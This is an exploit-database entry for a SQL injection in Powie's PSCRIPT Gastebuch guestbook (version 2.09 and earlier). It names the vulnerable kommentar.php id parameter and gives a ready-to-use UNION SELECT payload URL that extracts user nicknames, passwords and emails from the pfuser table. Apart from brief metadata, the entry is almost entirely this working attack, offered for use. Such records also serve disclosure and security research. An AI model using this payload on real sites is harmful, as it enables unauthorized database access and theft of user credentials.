Powie's PSCRIPT Gastebuch <= 2.09 SQL Injection Vulnerability

2010-03-29T00:00:00
ID 1337DAY-ID-11502
Type zdt
Reporter Easy Laster
Modified 2010-03-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================
Powie's PSCRIPT G?stebuch <= 2.09 SQL Injection Vulnerability
=============================================================

----------------------------Information------------------------------------------------
+Name :  Powie's PSCRIPT Gastebuch <= 2.09 SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 29.03.2010
+Script  : Powie's PSCRIPT Gastebuch <= 2.09
+Download : -----------------
+Price : for free version
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/gb/kommentar.php?id=
 
+Exploitable   : http://www.site.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5
,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2
 
-----------------------------------------------------------------------------------------



#  0day.today [2018-03-31]  #